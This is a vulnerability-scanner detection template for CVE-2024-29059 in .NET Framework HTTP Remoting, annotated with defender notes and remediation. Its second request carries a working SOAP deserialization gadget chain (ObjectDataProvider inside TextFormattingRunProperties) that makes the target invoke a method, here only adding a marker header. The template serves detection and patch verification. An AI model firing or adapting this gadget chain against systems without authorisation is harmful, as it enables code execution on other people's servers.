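# Detection template for CVE-2024-29059 (.NET Framework, HTTP .NET Remoting).
#
# This listing was captured from a blame view. The per-line timestamps and "|"
# gutter cells have been dropped and the YAML nesting restored so that the
# template parses again. Request lines, payload text, extractor and matcher
# expressions are unchanged.
#
# What the check does, in two requests:
#   1. Asks the remoting metadata endpoint for its WSDL while sending the
#      __RequestVerb header, and looks for a leaked ObjRef URI in the response.
#   2. Sends a SOAP message to that leaked URI. If the server deserializes it,
#      the response carries an X-Vuln-Test header holding a per-run random value.
# A finding is reported only when both observations hold.
#
# Defender notes:
#   - Step 2 exercises the deserialization path on the target rather than
#     fingerprinting it. Its only visible effect is one extra response header
#     on the scanner's own request.
#   - In web or proxy logs, the probe appears as a GET for
#     /RemoteApplicationMetadata.rem?wsdl carrying an __RequestVerb header,
#     followed by a POST with a SOAP body to a *.rem URI.
#   - NOTE(review): the marker relies on the System.Web HttpContext and the
#     referenced assemblies being available on the target. A host where they
#     are not may still leak an ObjRef in step 1 without ever setting the
#     header, so a non-match is not proof of a patched system. Confirm against
#     the patch level.

id: CVE-2024-29059

info:
  name: .NET Framework - Leaking ObjRefs via HTTP .NET Remoting
  author: iamnoooob,rootxharsh,DhiyaneshDk,pdresearch
  severity: high
  description: .NET Framework Information Disclosure Vulnerability
  # Added in review so that a finding carries an action for the asset owner.
  remediation: Apply the Microsoft security update for CVE-2024-29059 listed in the MSRC advisory, and avoid exposing .NET Remoting HTTP endpoints to untrusted networks.
  reference:
    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29059
    - https://code-white.com/blog/leaking-objrefs-to-exploit-http-dotnet-remoting/
    - https://github.com/codewhitesec/HttpRemotingObjRefLeak
  classification:
    # The CVSS vector rates the confidentiality impact only (C:H/I:N/A:N).
    # The template also carries the "deserialization" tag, and its second
    # request checks more than disclosure, so triage should not rest on the
    # vector alone.
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-29059
    # EPSS values are a snapshot from when the template was written.
    epss-score: 0.00043
    epss-percentile: 0.07503
    cpe: cpe:2.3:a:microsoft:.net_framework:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    shodan-query: 'Server: MS .NET Remoting'
    vendor: microsoft
    product: .net_framework
  tags: cve,cve2024,dotnet,microsoft,remoting,deserialization

http:
  - raw:
      # Request 1: metadata/WSDL request. The response body is searched for an
      # ObjRef URI by the "objref" extractor below.
      - |
        GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.1
        Host: {{Hostname}}
        __RequestVerb: POST
        Content-Type: text/xml

      # Request 2: sent to the URI extracted from request 1. The SOAP body
      # asks the server to add an X-Vuln-Test response header with a random
      # value, which serves as the marker for the check.
      - |
        POST {{objref}} HTTP/1.1
        Host: {{Hostname}}
        SOAPAction: ""
        Content-Type: text/xml

        <SOAP-ENV:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:clr="http://schemas.microsoft.com/soap/encoding/clr/1.0" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
        <a1:TextFormattingRunProperties id="ref-1" xmlns:a1="http://schemas.microsoft.com/clr/nsassem/Microsoft.VisualStudio.Text.Formatting/Microsoft.PowerShell.Editor%2C%20Version%3D3.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D31bf3856ad364e35">
        <ForegroundBrush id="ref-3"><ObjectDataProvider MethodName="AddHeader"
        xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
        xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
        xmlns:System="clr-namespace:System;assembly=mscorlib"
        xmlns:System.Web="clr-namespace:System.Web;assembly=System.Web"><ObjectDataProvider.ObjectInstance><ObjectDataProvider MethodName="get_Response"><ObjectDataProvider.ObjectInstance>
        <ObjectDataProvider ObjectType="{x:Type System.Web:HttpContext}" MethodName="get_Current" />
        </ObjectDataProvider.ObjectInstance>
        </ObjectDataProvider>
        </ObjectDataProvider.ObjectInstance>
        <ObjectDataProvider.MethodParameters>
        <System:String>X-Vuln-Test</System:String>
        <System:String>{{randstr}}</System:String>
        </ObjectDataProvider.MethodParameters>
        </ObjectDataProvider></ForegroundBrush>
        </a1:TextFormattingRunProperties>
        </SOAP-ENV:Envelope>

    extractors:
      # Captures the leaked URI from the first response body. The pattern is
      # /<hex or underscore run>/<alphanumeric, "_" or "+" run>_<digits>.rem.
      # "internal: true" keeps the value for request 2 and out of the report.
      - type: regex
        name: objref
        part: body_1
        group: 1
        regex:
          - "(/[0-9a-f_]+/[0-9A-Za-z_+]+_[0-9]+\\.rem)"
        internal: true

      # Reports the value of the X-Vuln-Test response header as evidence.
      - type: dsl
        dsl:
          - x_vuln_test

    matchers:
      # Both conditions must hold: the first response mentions ObjRef, and the
      # marker header echoes this run's random value. The echo ties the header
      # to this request rather than to a static header the server always sends.
      - type: dsl
        dsl:
          - "contains(body_1,'ObjRef')"
          - "contains(x_vuln_test,'{{randstr}}')"
        condition: and
# NOTE(review): the digest below was produced for the upstream template text.
# Any change to the file, including the comments and the remediation field
# added here, means it no longer verifies. Re-sign the template before relying
# on signature checks.
# digest: 490a00463044022075eae4fa0532f3bf10a0c94bd222dc4fd59b85ae03a5e0d02f2cd542a4069e5402206cfa5cdac2a1493b73fd82d8668018e591c958cf6d0dfd4e44786def094a509a:922c64590222798bb761d5b6d8e72950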